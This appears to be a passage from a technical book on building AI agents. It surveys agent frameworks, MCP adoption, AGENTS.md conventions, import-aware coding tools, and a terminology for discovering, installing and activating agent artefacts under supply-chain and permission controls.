Letta (https://www.letta.com/, formerly MemGPT) is a platform for building stateful agents with advanced memory that can learn and self-improve over time. In January 2026, Letta shipped a Conversations API for agents with shared memory across parallel user experiences, and its Letta Code agent ranked #1 on Terminal-Bench among model-agnostic open-source agents. In February 2026, Letta introduced Context Repositories, a feature that gives agents structured, revisable long-term knowledge bases—moving beyond conversational memory toward persistent project-scoped context. Letta’s architecture emphasises programmable memory management—where OpenClaw focuses on channel integration and skills, Letta focuses on making agents that remember and adapt intelligently. The LettaBot project (https://github.com/letta-ai/lettabot) brings Letta’s memory capabilities to a multi-channel personal assistant supporting Telegram, Slack, Discord, WhatsApp, and Signal.

Langroid (https://langroid.github.io/langroid/) is a Python multi-agent framework from CMU and UW-Madison researchers that emphasises simplicity and composability. Langroid has enhanced MCP support with persistent connections, Portkey integration for unified access to 200+ LLMs, and declarative task termination patterns. Its architecture treats agents, tasks, and tools as lightweight composable objects, making it well-suited for teams that want multi-agent orchestration without heavy infrastructure.

Open Interpreter (https://github.com/openinterpreter/open-interpreter) provides a natural language interface for controlling computers. Its “New Computer Update” (late 2024) was a complete rewrite supporting a standard interface between language models and computer operations. While less focused on multi-channel messaging than OpenClaw, Open Interpreter fills a complementary niche: using an LLM to drive local computer actions (file management, browser automation, system administration) through plain language.

Leon (https://getleon.ai/) is an open-source personal assistant built in JavaScript with natural speech recognition, task management, and extendable skills. It is installable via npm on Linux, Mac, or Windows, and appeals to developers who want a lightweight, self-hosted assistant without the full complexity of OpenClaw’s multi-channel architecture.

These projects collectively represent a broad trend: users increasingly expect AI assistants that run locally, remember context across sessions and channels, and respect data privacy by default. The architectural patterns that OpenClaw popularised—gateway/runtime separation, plugin-based skills, model-agnostic backends—are now standard across the category.

Several other frameworks share architectural patterns with OpenClaw:

LangChain and LangGraph

LangChain (https://docs.langchain.com) provides composable building blocks for LLM applications. LangChain and LangGraph have both reached v1.0 milestones.

Snippet status: Runnable example pattern (validated against LangChain v1 docs, Feb 2026; create_agent builds a graph-based agent runtime using LangGraph under the hood).

from langchain.agents import create_agent
from langchain_core.tools import tool

@tool
def search_documentation(query: str) -> str:
    """Search project documentation for relevant information."""
    # Implementation
    return "..."

agent = create_agent(
    model="gpt-4o-mini",
    tools=[search_documentation],
    system_prompt="Use tools when needed, then summarize clearly.",
)
result = agent.invoke({"messages": [{"role": "user", "content": "Find testing docs"}]})

Shared patterns with OpenClaw: Tool registration, agent composition, memory management.

LangGraph (https://langchain-ai.github.io/langgraph/) extends LangChain with graph-based agent orchestration.

CrewAI

CrewAI (https://docs.crewai.com/) focuses on multi-agent collaboration with role-based specialization:

from crewai import Agent, Task, Crew

researcher = Agent(
    role='Senior Researcher',
    goal='Discover new insights',
    backstory='Expert in finding and analyzing information',
    tools=[search_tool, analysis_tool]
)

writer = Agent(
    role='Technical Writer',
    goal='Create clear documentation',
    backstory='Skilled at explaining complex topics',
    tools=[writing_tool]
)

crew = Crew(
    agents=[researcher, writer],
    tasks=[research_task, writing_task],
    process=Process.sequential
)

Shared patterns with OpenClaw: Role-based agents, sequential and parallel execution, tool assignment per agent.

Version 1.8.0 (February 2026) added native A2A protocol support, enabling CrewAI agents to interoperate with agents built on other frameworks through standardised task delegation. CrewAI also added built-in MCP client support, so crews can connect to any MCP server as a tool source.

Microsoft Semantic Kernel

Semantic Kernel (https://learn.microsoft.com/semantic-kernel/) emphasizes enterprise integration and plugin architecture. Semantic Kernel is converging with AutoGen into the Microsoft Agent Framework (see AutoGen section below):

var kernel = Kernel.CreateBuilder()
    .AddOpenAIChatCompletion("gpt-4", apiKey)
    .Build();

// Import plugins
kernel.ImportPluginFromType<TimePlugin>();
kernel.ImportPluginFromType<FileIOPlugin>();

// Create agent with plugins
var agent = new ChatCompletionAgent {
    Kernel = kernel,
    Name = "ProjectAssistant",
    Instructions = "Help manage project tasks and documentation"
};

Shared patterns with OpenClaw: Plugin system, kernel/runtime separation, enterprise-ready design.

AutoGen / Microsoft Agent Framework

AutoGen (https://microsoft.github.io/autogen/stable/) was rewritten from the ground up as v0.4 in January 2025, adopting an asynchronous, event-driven architecture. In October 2025, Microsoft announced the convergence of AutoGen and Semantic Kernel into a unified Microsoft Agent Framework, with general availability scheduled for Q1 2026. AutoGen v0.4 continues to receive critical fixes, but significant new features target the unified framework.

Snippet status: Runnable example pattern (AutoGen v0.4 API, Feb 2026).

import asyncio
from autogen_agentchat.agents import AssistantAgent
from autogen_ext.models.openai import OpenAIChatCompletionClient

async def main() -> None:
    agent = AssistantAgent(
        "coding_assistant",
        OpenAIChatCompletionClient(model="gpt-4o"),
    )
    result = await agent.run(task="Create a Python web scraper")
    print(result)

asyncio.run(main())

Note: The v0.2 API (from autogen import AssistantAgent) is deprecated. Migrate to autogen_agentchat and autogen_ext packages. See the migration guide at https://microsoft.github.io/autogen/stable/user-guide/agentchat-user-guide/migration-guide.html.

Shared patterns with OpenClaw: Agent-to-agent communication, code execution environments, conversation-driven workflows.

Comparing Architecture Patterns

Feature	OpenClaw	LangChain	CrewAI	MS Agent Framework†
Primary Focus	Personal assistant	LLM app building	Team collaboration	Enterprise agents
Runtime	Local-first	Flexible	Python process	.NET/Python
Multi-Agent	Via swarms	Via LangGraph	Built-in	Built-in
Tool System	Plugin-based	Tool decorators	Tool assignment	Plugin imports
Memory	Persistent local	Configurable	Per-agent	Configurable
Best For	Personal automation	Prototyping	Complex workflows	Enterprise apps

† Microsoft Agent Framework is the convergence of Semantic Kernel and AutoGen, announced October 2025.

OpenAI Agents SDK

The OpenAI Agents SDK (https://openai.github.io/openai-agents-python/) is the production-ready successor to the experimental Swarm project, launched March 2025. It provides easily configurable agents with instructions and built-in tools, agent handoffs for intelligent control transfer, built-in guardrails, and tracing for debugging. Available in both Python and TypeScript.

Shared patterns with OpenClaw: Agent handoffs, tool registration, guardrails, conversation-driven workflows.

Google Agent Development Kit (ADK)

Google ADK (https://google.github.io/adk-docs/) is an open-source framework introduced at Cloud NEXT 2025 for developing multi-agent systems. It is model-agnostic (optimised for Gemini but compatible with other providers) and supports the Agent-to-Agent (A2A) protocol for inter-agent communication. Primary SDK is Python; TypeScript and Go SDKs are in active development.

Shared patterns with OpenClaw: Multi-agent orchestration, model-agnostic design, tool registration.

MCP: Modern Tooling and Adoption

The Model Context Protocol (MCP) (https://modelcontextprotocol.io/) has become a practical standard for connecting agents to tools and data sources. In December 2025, Anthropic donated MCP governance to the Agentic AI Foundation (AAIF) under the Linux Foundation, signalling its transition from a single-vendor project to a true industry standard. The ecosystem reports over 97 million monthly SDK downloads and more than 10,000 active MCP servers. MCP Apps launched as the first official extension, enabling interactive UIs (charts, forms, dashboards) to render directly inside MCP clients. Today, MCP is less about novel capability and more about reliable interoperability: the same tool server can be used by multiple agent clients with consistent schemas, permissions, and response formats.

What MCP Brings to Tools

Portable tool definitions: JSON schemas and well-known server metadata make tools discoverable across clients.
Safer tool execution: capability-scoped permissions, explicit parameters, and auditable tool calls.
Composable context: servers can enrich model context with structured resources (files, APIs, or databases) without bespoke glue code.

Recent MCP revisions also strengthen production readiness: streamable HTTP transport, standardized OAuth 2.1-based authorization discovery, and clearer user-input elicitation flows. These changes matter because they reduce client/server edge-case handling and make policy enforcement more uniform across implementations.

Common Usage Patterns

Server-based tool catalogs
- Teams deploy MCP servers per domain (e.g., “repo-tools”, “ops-tools”, “research-tools”).
- Clients discover available tools at runtime and choose based on metadata, not hardcoded lists.
Context stitching
- Agents gather context from multiple servers (docs, tickets, metrics) and assemble it into a task-specific prompt.
- The server provides structured resources so the client can keep the prompt lean.
Permission-first workflows
- Tool calls are scoped by project, environment, or role.
- Audit logs track who called what tool with which inputs.
Fallback-first reliability
- Clients maintain fallbacks when a server is down (cached data, read-only mirrors, or alternative tool servers).
Registry-backed discovery
- Teams publish approved servers to an internal or public registry for discoverability.
- Activation still happens through local policy, so discovery does not imply execution permission.

Acceptance Across Major Clients

MCP is broadly accepted as a tooling interoperability layer. The specifics vary by vendor, but the pattern is consistent: MCP servers expose the tools and resources, while clients orchestrate tool calls and manage safety policies.

Codex (GPT-5.3-Codex) (https://openai.com/index/introducing-codex/) Codex clients commonly use MCP servers to standardize tool access (repo browsing, test execution, task automation). Codex also supports skills packaged with SKILL.md and progressive disclosure (see https://developers.openai.com/codex). The main adoption pattern is organization-level MCP servers that provide consistent tools across multiple repos.
GitHub Copilot (https://docs.github.com/en/copilot)
Copilot deployments increasingly treat MCP as a bridge between editor experiences and organization tooling. This typically means MCP servers that expose repo-aware tools (search, CI status, documentation retrieval) so the assistant can operate with consistent, policy-driven access.
Claude (https://code.claude.com/docs)
Claude integrations often use MCP to provide structured context sources (knowledge bases, issue trackers, dashboards). The MCP server becomes the policy boundary, while the client focuses on prompt composition and response quality.

Practical Guidance for Authors and Teams

Document your MCP servers like any other tool: include schemas, permissions, and usage examples.
Version tool contracts so clients can adopt changes incrementally.
Prefer narrow, composable tools over large monolithic endpoints.
Treat MCP as infrastructure: invest in uptime, monitoring, and security reviews.

Best Practices

Version Tools and Skills

class VersionedTool:
    def __init__(self, version: str):
        self.version = version
        self.name = f"{self.__class__.__name__}_v{version}"

Test Independently

# test_tools.py
import pytest

def test_markdown_validator():
    tool = MarkdownValidatorTool()
    
    # Test valid markdown
    valid_md = "# Header\n\nContent"
    result = tool.execute(valid_md)
    assert result['valid']
    
    # Test invalid markdown
    invalid_md = "```python\ncode without closing"
    result = tool.execute(invalid_md)
    assert not result['valid']
    assert any(i['type'] == 'unclosed_code_block' for i in result['issues'])

Provide Fallbacks

class ResilientTool:
    def __init__(self, primary_impl, fallback_impl):
        self.primary = primary_impl
        self.fallback = fallback_impl
    
    def execute(self, **kwargs):
        try:
            return self.primary.execute(**kwargs)
        except Exception as e:
            logger.warning(f"Primary implementation failed: {e}")
            return self.fallback.execute(**kwargs)

Monitor Usage

class MonitoredTool:
    def __init__(self, tool, metrics_collector):
        self.tool = tool
        self.metrics = metrics_collector
    
    def execute(self, **kwargs):
        start = time.time()
        try:
            result = self.tool.execute(**kwargs)
            self.metrics.record_success(self.tool.name, time.time() - start)
            return result
        except Exception as e:
            self.metrics.record_failure(self.tool.name, str(e))
            raise

Emerging Standards: AGENTS.md

This chapter is the canonical AGENTS.md reference for the book. Other chapters should link here rather than duplicating full templates.

The AGENTS.md Pseudo-Standard

AGENTS.md has emerged as an open pseudo-standard for providing AI coding agents with project-specific instructions. Think of it as a “README for agents”—offering structured, machine-readable guidance that helps agents understand how to work within a codebase.

Purpose and Benefits

Consistent Instructions: All agents receive the same project-specific guidance
Rapid Onboarding: New agent sessions understand the project immediately
Safety Boundaries: Clear boundaries prevent accidental damage to protected files
Maintainability: Single source of truth for agent behavior in a project

Structure and Placement

AGENTS.md files can be placed hierarchically in a project:

project/
|-- AGENTS.md           # Root-level instructions (project-wide)
|-- src/
|   `-- AGENTS.md       # Module-specific instructions
|-- tests/
|   `-- AGENTS.md       # Testing conventions
`-- docs/
    `-- AGENTS.md       # Documentation guidelines

Agents use the nearest AGENTS.md file, enabling scoped configuration for monorepos or complex projects.

Example AGENTS.md

# AGENTS.md

## Project Overview
This is a TypeScript web application using Express.js and React.

## Setup Instructions
npm install
npm run dev

## Coding Conventions
- Language: TypeScript 5.x
- Style guide: Airbnb
- Formatting: Prettier with provided config
- Test framework: Jest

## Build and Deploy
- Build: `npm run build`
- Test: `npm test`
- Deploy: CI/CD via GitHub Actions

## Agent-Specific Notes
- Always run `npm run lint` before committing
- Never modify files in `vendor/` or `.github/workflows/`
- Secrets are in environment variables, never hardcoded
- All API endpoints require authentication middleware

While AGENTS.md has achieved broad adoption as the standard for project-level agent instructions, the space continues to evolve. Several related concepts are under discussion in the community:

Skills Documentation

There is no formal skills.md standard, but skill documentation patterns are emerging:

Skill catalogs listing available agent capabilities
Capability declarations specifying what an agent can do
Dependency manifests defining tool and skill requirements

Personality and Values

Some frameworks experiment with “soul” or personality configuration. Note that “soul” is a metaphorical term used in some AI agent frameworks to describe an agent’s core personality, values, and behavioral guidelines—it’s industry jargon rather than a formal technical specification:

System prompts defining agent persona and communication style
Value alignment specifying ethical guidelines and constraints
Behavioral constraints limiting what agents should and shouldn’t do

Currently, these are implemented in vendor-specific formats rather than open standards. The community continues to discuss whether formalization is needed.

How Agents Become Aware of Imports

One of the most practical challenges in agentic development is helping agents understand a codebase’s import structure and dependencies. When an agent modifies code, it must know what modules are available, where they come from, and how to properly reference them.

The Import Awareness Problem

When agents generate or modify code, they face several import-related challenges:

Missing imports: Adding code that uses undefined symbols
Incorrect import paths: Using wrong relative or absolute paths
Circular dependencies: Creating imports that cause circular reference errors
Unused imports: Leaving orphan imports after code changes
Conflicting names: Importing symbols that shadow existing names

Mechanisms for Import Discovery

Modern coding agents use multiple strategies to understand imports:

Static Analysis Tools

Agents leverage language servers and static analyzers to understand import structure:

class ImportAnalyzer:
    """Analyze imports using static analysis"""
    
    def __init__(self, workspace_root: str):
        self.workspace = workspace_root
        self.import_graph = {}
    
    def analyze_file(self, filepath: str) -> dict:
        """Extract import information from a file"""
        with open(filepath) as f:
            content = f.read()
        
        # Parse AST to find imports
        tree = ast.parse(content)
        imports = []
        
        for node in ast.walk(tree):
            if isinstance(node, ast.Import):
                for alias in node.names:
                    imports.append({
                        'type': 'import',
                        'module': alias.name,
                        'alias': alias.asname
                    })
            elif isinstance(node, ast.ImportFrom):
                imports.append({
                    'type': 'from_import',
                    'module': node.module,
                    'names': [a.name for a in node.names],
                    'level': node.level  # relative import level
                })
        
        return {
            'file': filepath,
            'imports': imports,
            'defined_symbols': self._extract_definitions(tree)
        }
    
    def build_dependency_graph(self) -> dict:
        """Build a graph of all file dependencies"""
        for filepath in self._find_source_files():
            analysis = self.analyze_file(filepath)
            self.import_graph[filepath] = analysis
        return self.import_graph

Language Server Protocol (LSP)

Language servers provide real-time import information that agents can query:

class LSPImportProvider:
    """Use LSP to discover available imports"""
    
    async def get_import_suggestions(self, symbol: str, context_file: str) -> list:
        """Get import suggestions for an undefined symbol"""
        
        # Query language server for symbol locations
        response = await self.lsp_client.request('textDocument/codeAction', {
            'textDocument': {'uri': context_file},
            'context': {
                'diagnostics': [{
                    'message': f"Cannot find name '{symbol}'"
                }]
            }
        })
        
        # Extract import suggestions from code actions
        suggestions = []
        for action in response:
            if 'import' in action.get('title', '').lower():
                suggestions.append({
                    'import_statement': action['edit']['changes'],
                    'source': action.get('title')
                })
        
        return suggestions
    
    async def get_exported_symbols(self, module_path: str) -> list:
        """Get all exported symbols from a module"""
        
        # Use workspace/symbol to find exports
        symbols = await self.lsp_client.request('workspace/symbol', {
            'query': '',
            'uri': module_path
        })
        
        return [s['name'] for s in symbols if s.get('kind') in EXPORTABLE_KINDS]

Project Configuration Files

Agents read configuration files to understand module resolution:

class ProjectConfigReader:
    """Read project configs to understand import paths"""
    
    def get_import_config(self, project_root: str) -> dict:
        """Extract import configuration from project files"""
        
        config = {
            'base_paths': [],
            'aliases': {},
            'external_packages': []
        }
        
        # TypeScript/JavaScript: tsconfig.json, jsconfig.json
        tsconfig_path = os.path.join(project_root, 'tsconfig.json')
        if os.path.exists(tsconfig_path):
            with open(tsconfig_path) as f:
                tsconfig = json.load(f)
            
            compiler_opts = tsconfig.get('compilerOptions', {})
            config['base_paths'].append(compiler_opts.get('baseUrl', '.'))
            config['aliases'] = compiler_opts.get('paths', {})
        
        # Python: pyproject.toml, setup.py
        pyproject_path = os.path.join(project_root, 'pyproject.toml')
        if os.path.exists(pyproject_path):
            with open(pyproject_path) as f:
                pyproject = toml.load(f)
            
            # Extract package paths from tool.setuptools or poetry config
            if 'tool' in pyproject:
                if 'setuptools' in pyproject['tool']:
                    config['base_paths'].extend(
                        pyproject['tool']['setuptools'].get('package-dir', {}).values()
                    )
        
        return config

Package Manifest Analysis

Agents check package manifests to know what’s available:

class PackageManifestReader:
    """Read package manifests to understand available dependencies"""
    
    def get_available_packages(self, project_root: str) -> dict:
        """Get list of available packages from manifest"""
        
        packages = {'direct': [], 'transitive': []}
        
        # Node.js: package.json
        package_json = os.path.join(project_root, 'package.json')
        if os.path.exists(package_json):
            with open(package_json) as f:
                pkg = json.load(f)
            packages['direct'].extend(pkg.get('dependencies', {}).keys())
            packages['direct'].extend(pkg.get('devDependencies', {}).keys())
        
        # Python: requirements.txt, Pipfile, pyproject.toml
        requirements = os.path.join(project_root, 'requirements.txt')
        if os.path.exists(requirements):
            with open(requirements) as f:
                for line in f:
                    line = line.strip()
                    if line and not line.startswith('#'):
                        # Extract package name (before version specifier)
                        pkg_name = re.split(r'[<>=!]', line)[0].strip()
                        packages['direct'].append(pkg_name)
        
        return packages

Best Practices for Import-Aware Agents

Document Import Conventions in AGENTS.md

For standardized terminology (artefact, discovery, import, install, activate) and trust boundaries, see Discovery and Imports. In this section we apply those concepts to codebase-level import resolution.

Include import guidance in your project’s AGENTS.md:

## Import Conventions

### Path Resolution
- Use absolute imports from `src/` as the base
- Prefer named exports over default exports
- Group imports: stdlib, external packages, local modules

### Example Import Order
```python
# Standard library
import os
import sys
from typing import Dict, List

# Third-party packages
import requests
from pydantic import BaseModel

# Local modules
from src.utils import helpers
from src.models import User

Alias Conventions

@/ maps to src/
@components/ maps to src/components/ ```text

Use Import Auto-Fix Tools

Configure agents to use automatic import fixers:

class ImportAutoFixer:
    """Automatically fix import issues in agent-generated code"""
    
    def __init__(self, tools: List[Tool]):
        self.isort = tools.get('isort')  # Python import sorting
        self.eslint = tools.get('eslint')  # JS/TS import fixing
    
    async def fix_imports(self, filepath: str) -> dict:
        """Fix and organize imports in a file"""
        
        results = {'fixed': [], 'errors': []}
        
        if filepath.endswith('.py'):
            # Run isort for Python
            result = await self.isort.execute(filepath)
            if result['success']:
                results['fixed'].append('isort: organized imports')
            
            # Run autoflake to remove unused imports
            result = await self.autoflake.execute(
                filepath, 
                remove_unused_imports=True
            )
            if result['success']:
                results['fixed'].append('autoflake: removed unused')
        
        elif filepath.endswith(('.ts', '.tsx', '.js', '.jsx')):
            # Run eslint with import rules
            result = await self.eslint.execute(
                filepath,
                fix=True,
                rules=['import/order', 'unused-imports/no-unused-imports']
            )
            if result['success']:
                results['fixed'].append('eslint: fixed imports')
        
        return results

Validate Imports Before Committing

Add import validation to agent workflows:

# .github/workflows/validate-imports.yml
name: Validate Imports
on: [pull_request]

jobs:
  check-imports:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v6
      
      - name: Check Python imports
        run: |
          pip install isort autoflake
          isort --check-only --diff .
          autoflake --check --remove-all-unused-imports -r .
      
      - name: Check TypeScript imports
        run: |
          npm ci
          npx eslint --rule 'import/no-unresolved: error' .

Import Awareness in Multi-Agent Systems

When multiple agents collaborate, maintaining consistent import awareness requires coordination:

class SharedImportContext:
    """Shared import context for multi-agent systems"""
    
    def __init__(self):
        self.import_cache = {}
        self.pending_additions = []
    
    def register_new_export(self, module: str, symbol: str, agent_id: str):
        """Register a new export created by an agent"""
        if module not in self.import_cache:
            self.import_cache[module] = []
        
        self.import_cache[module].append({
            'symbol': symbol,
            'added_by': agent_id,
            'timestamp': datetime.now()
        })
    
    def query_available_imports(self, symbol: str) -> List[dict]:
        """Query where a symbol can be imported from"""
        results = []
        for module, exports in self.import_cache.items():
            for export in exports:
                if export['symbol'] == symbol:
                    results.append({
                        'module': module,
                        'symbol': symbol,
                        'import_statement': f"from {module} import {symbol}"
                    })
        return results

Understanding how agents discover and manage imports is essential for building reliable agentic coding systems. The combination of static analysis, language servers, project configuration, and clear documentation ensures agents can write code that integrates correctly with existing codebases.

Key Takeaways

Tools are atomic capabilities that perform single operations, while skills are composed behaviours that orchestrate multiple tools to accomplish complex tasks. When designing tools, follow single responsibility principles and provide clear interfaces that agents can use reliably. Skills orchestrate multiple tools to accomplish complex tasks, and they can themselves be composed to create more powerful capabilities.

Use registries for discovery and management, allowing agents to find available tools and skills at runtime. Always document, test, and version your tools and skills so that changes are traceable and consumers know what to expect. Monitor usage to identify issues and optimisation opportunities—without metrics, you cannot improve performance or reliability.

AGENTS.md is the emerging standard for project-level agent instructions, providing a single source of truth for how agents should work within a codebase. Skills Protocol defines how runtimes execute skills, while Agent Skills defines how skills are packaged for distribution. MCP standardises tool interoperability across clients and hosts, allowing the same tool server to work with multiple agent platforms.

Import awareness requires combining static analysis, Language Server Protocol (LSP) integration, and project configuration reading to ensure agents generate code with correct dependencies. OpenClaw, LangChain, CrewAI, and similar frameworks share common patterns for tool and skill management that you can learn from regardless of which platform you choose.

Discovery and Imports

Chapter Preview

This chapter standardises language that often gets overloaded in agentic systems. We define what an artefact is, what discovery means in practice, and how import, install, and activate are separate operations with different safety controls.

The chapter builds a taxonomy for what gets discovered—tools, skills, agents, and workflow fragments—providing clear definitions that prevent confusion as systems grow more complex. It compares discovery mechanisms including local scans, registries, domain conventions, and explicit configuration, explaining the trade-offs of each approach. Finally, it disambiguates the operations of import, install, and activate, mapping each step to appropriate trust and supply-chain controls.

Terminology Baseline for the Rest of the Book

To keep later chapters precise, this chapter uses five core terms consistently.

An artefact is any reusable unit a workflow can reference, including tool endpoint metadata, a skill bundle, an agent definition, or a workflow fragment. Discovery is the process of finding candidate artefacts that might be useful for a given task. Import means bringing a discovered artefact into the current resolution or evaluation context so it can be referenced. Install means fetching and persisting an artefact (typically pinned to a specific version), along with integrity metadata such as checksums or signatures. Activate means making an installed or imported artefact callable by an agent in a specific run context.

Standardisation rule: Use these verbs literally. Do not use “import” when you mean “install,” and do not use “install” when you mean “activate.” Precise terminology prevents misunderstandings about what security controls apply at each stage.

A Taxonomy That Disambiguates What We Are Discovering

1) Tool artefacts

A tool is an executable capability exposed via a protocol or command surface. A tool’s identity is its endpoint identity, such as an MCP server URL combined with an authentication context. A tool’s interface consists of the enumerated callable operations it exposes, including their names, schemas, and permission requirements.

Discovery usually finds endpoints first; tool enumeration happens after connection, when the client can query what operations the tool server supports.

2) Skill artefacts

A skill is a packaged reusable bundle of instructions, templates, and optional scripts. A skill’s identity is its bundle source, which may be a repository path, a registry coordinate, or a version and digest combination. A skill’s interface comprises its documented entrypoints, expected inputs and outputs, and policy constraints that govern how it may be used.

3) Agent artefacts

An agent artefact is a role and configuration definition that specifies a persona, constraints, and operating policy. An agent’s identity is a named definition file and version. An agent’s interface includes its responsibilities, boundaries, and the set of capabilities it is allowed to use.

4) Workflow-fragment artefacts

A workflow fragment is a reusable partial workflow, such as a GH-AW component that can be imported into other workflows. A workflow fragment’s identity is its source file path or import address. A workflow fragment’s interface includes its parameters, the context it expects, and the outputs it emits.

Confusing cases to stop using

Several common conflations cause confusion and should be avoided. A tool is not the same as a skill: tools execute capabilities, while skills package guidance and assets that tell agents how to use tools effectively. A skill is not the same as an agent: skills are reusable bundles of instructions, while agents are operating roles that may use skills. An agent is not the same as a workflow fragment: an agent is an actor that performs work, while a fragment is orchestration structure that defines how work flows between actors.

When this book says “discover capabilities,” read it as “discover artefacts, then import, install, or activate according to type.”

Discovery Mechanisms

Discovery is how runtimes gather candidate artefacts before selection. Different mechanisms suit different contexts.

Local scan

Local scanning examines repository paths and conventions (for example, .github/workflows/, skills/, agents/) to find artefacts available within the codebase. The advantages are low latency, high transparency, and easy review in code—everything is visible in the repository. The disadvantages are limited scope and convention drift in large monorepos, where different teams may adopt inconsistent conventions.

Registry discovery

Registry discovery queries a curated index or marketplace for artefacts. The advantages include centralised metadata, version visibility, and governance hooks that can enforce organisational policy. The disadvantages are that trust shifts to registry policy (the registry becomes a critical dependency), and namespace collisions are possible when multiple teams use similar names.

Domain-convention discovery

Domain-convention discovery resolves artefacts via domain naming conventions, such as .well-known-style descriptors that expose capability metadata at predictable URLs. The advantage is interoperable discovery across organisational boundaries—you can discover capabilities from external partners using a standard protocol. The disadvantage is that conventions may be ecosystem-specific and are not always standardised across vendors.

Explicit configuration

Explicit configuration uses a pinned manifest that enumerates allowed sources and versions. The advantages are strongest reproducibility and auditability—you know exactly what artefacts will be used. The disadvantages are less flexibility and the need for deliberate updates whenever artefacts change.

Decision rule: If provenance cannot be authenticated, prefer explicit configuration over dynamic discovery. Security concerns outweigh convenience when you cannot verify where an artefact came from.

Import, Install, Activate: Three Different Operations

Import

Import brings an artefact into the current resolution context. In language and module terms, this looks like from src.utils import helpers. In GH-AW terms, this looks like imports: [shared/common-tools.md]. Import makes the artefact available for reference but does not necessarily make it callable.

Install

Install fetches and persists artefacts for repeatable use. For example, you might store skill-x@1.4.2 with checksum and signature metadata to ensure integrity. Another example is locking a workflow component revision to a commit digest so that future runs use the exact same version.

Activate

Activate makes an artefact callable under policy. For example, you might expose only bash and edit tools to a CI agent, withholding more dangerous capabilities. Another example is enabling a skill only after an approval gate passes, ensuring human oversight for high-impact operations.

A practical sequence is often: discover → select → import/install → activate → execute.

Trust Boundaries and Supply Chain (Compact Model)

Each stage has distinct risks and controls.

Integrity addresses whether an artefact was tampered with, and the controls are checksums and signatures. Authenticity addresses who published the artefact, and the controls are identity verification and trusted publisher lists. Provenance addresses how an artefact was built, and the controls are attestations, software bills of materials (SBOM), and reproducible build metadata. Capability safety addresses what an artefact can do, and the controls are least privilege, sandboxing, and constrained outputs.

The control mapping by stage is as follows. Discovery controls include allowlists of domains and registries. Import and install controls include pinning plus checksum and signature verification. Activation controls include permission gates, scoped credentials, and sandbox profiles. Runtime controls include audit logs, safe outputs, and policy evaluation traces.

Worked Examples

Example A: GH-AW workflow-fragment import

# .github/workflows/docs-refresh.md
name: Docs Refresh
on:
  workflow_dispatch:
imports:
  - shared/common-tools.md

permissions:
  contents: read

In this example, shared/common-tools.md is a workflow-fragment artefact. The imports directive is the import operation. A separate policy decides whether imported tools are activated at runtime.

Example B: AGENTS.md import conventions as resolution policy

## Import Conventions
- Prefer absolute imports from `src/`
- Group imports: stdlib, third-party, local
- Use `@/` alias for `src/`

This example does not install dependencies. It standardises import resolution behaviour so agents generate consistent code. Activation still depends on tool and runtime permissions.

Example C: Capability discovery and activation policy

# policies/capability-sources.yml
allowed_domains:
  - "skills.example.com"
allowed_registries:
  - "registry.internal/agent-skills"
pinned:
  "registry.internal/agent-skills/reviewer": "2.3.1"
checksums:
  "registry.internal/agent-skills/reviewer@2.3.1": "sha256:..."
activation_gates:
  require_human_approval_for:
    - "github.write"
    - "bash.exec"

In this example, discovery scope is constrained first by the allowed domains and registries. Import and install are pinned and integrity-checked via the pinned versions and checksums. High-impact capabilities require explicit activation approval through the activation gates.

Key Takeaways

Treat artefact, discovery, import, install, and activate as distinct terms with precise meanings. Discovering a tool endpoint is not the same as activating its capabilities—each stage requires different security controls. Use taxonomy-first language: tool, skill, agent, and workflow fragment are different artefact types with different identity and interface properties.

Prefer explicit, pinned configuration when provenance or authenticity is uncertain; the convenience of dynamic discovery is not worth the security risk. Apply controls by stage: allowlist at discovery, verify at import and install, and enforce least privilege at activation and runtime.

For tool and skill design conventions, see Skills and Tools Management. For GH-AW composition syntax, see GitHub Agentic Workflows (GH-AW).

MCP Servers and Agent Skills: A Practical Directory

Chapter Preview

This chapter provides two things the preceding chapters intentionally left out: a curated directory of specific, useful MCP servers and Agent Skills organised by category, and concrete recipes for announcing your own MCPs and Skills to visiting AI models. Chapter Skills and Tools Management covered design principles and protocol mechanics; chapter Discovery and Imports established the taxonomy of discovery, import, install, and activate. This chapter puts that theory to work with real names, real URLs, and real configuration files.

Note: Treat this chapter as a dated landscape snapshot. The MCP ecosystem adds new servers weekly. Verify links and version numbers against current sources before adopting.

The MCP Ecosystem at Scale

The Model Context Protocol ecosystem has grown from near-zero to an estimated 17,000 or more server implementations in under two years. The official MCP Registry at registry.modelcontextprotocol.io indexes a curated subset; third-party directories track the broader landscape. The community-maintained punkpeye/awesome-mcp-servers repository alone has over 80,000 GitHub stars.

A significant shift occurred in late 2025 and early 2026: major companies began maintaining their own official MCP servers, replacing earlier community reference implementations. The MCP Steering Group archived several former reference servers (Brave Search, GitHub, GitLab, Google Drive, PostgreSQL, Puppeteer, Slack, and others) as vendors took over maintenance. This transition means that the most reliable servers are increasingly the official ones published by the companies whose services they expose.

Finding MCP Servers

The Official MCP Registry

The official registry launched in September 2025 in preview at registry.modelcontextprotocol.io. It is maintained by the MCP Steering Group and acts as the authoritative source for publicly available MCP servers. The registry API (v0.1) supports search by name, category, and usage metrics.

The reference server repository at github.com/modelcontextprotocol/servers (approximately 78,000 stars) contains implementations maintained directly by the Steering Group. These reference servers serve as both functional tools and implementation examples.

Third-Party Directories

Several third-party directories track the broader ecosystem beyond the official registry.

Directory	Approximate Scale	Focus
PulseMCP (pulsemcp.com)	8,000+ servers	Curated, updated daily, excludes low-quality implementations
Smithery (smithery.ai)	2,200+ servers	Installation guides, one-click setup
Glama (glama.ai/mcp/servers)	Synced with awesome lists	Marketplace format, synced with community lists
MCP Market (mcpmarket.com)	Top 100 leaderboard	Ranked by GitHub stars and usage
mcpservers.org	Web directory	Companion to awesome lists, browsable categories

Awesome Lists

The punkpeye/awesome-mcp-servers repository organises servers into over 25 categories and is the most widely referenced starting point. The meta-list esc5221/awesome-awesome-mcp-servers aggregates multiple awesome lists for comprehensive discovery.

MCP Servers by Category

The tables below list specific servers that are actively maintained as of February 2026. Entries marked “Official” are maintained by the service vendor; entries marked “Community” are maintained by independent developers.

Reference Servers (MCP Steering Group)

These are maintained in the modelcontextprotocol/servers repository and serve as both functional tools and reference implementations.

Server	Purpose
Everything	Reference and test server exposing prompts, resources, and tools
Fetch	Web content fetching and conversion for efficient LLM consumption
Filesystem	Secure file operations with configurable access controls
Git	Read, search, and manipulate Git repositories
Memory	Knowledge-graph-based persistent memory system
Sequential Thinking	Dynamic and reflective problem-solving through thought sequences
Time	Time and timezone conversion

Developer Tools

Server	Maintainer	Description
GitHub MCP Server	Official	Repository management, pull requests, issues, code review
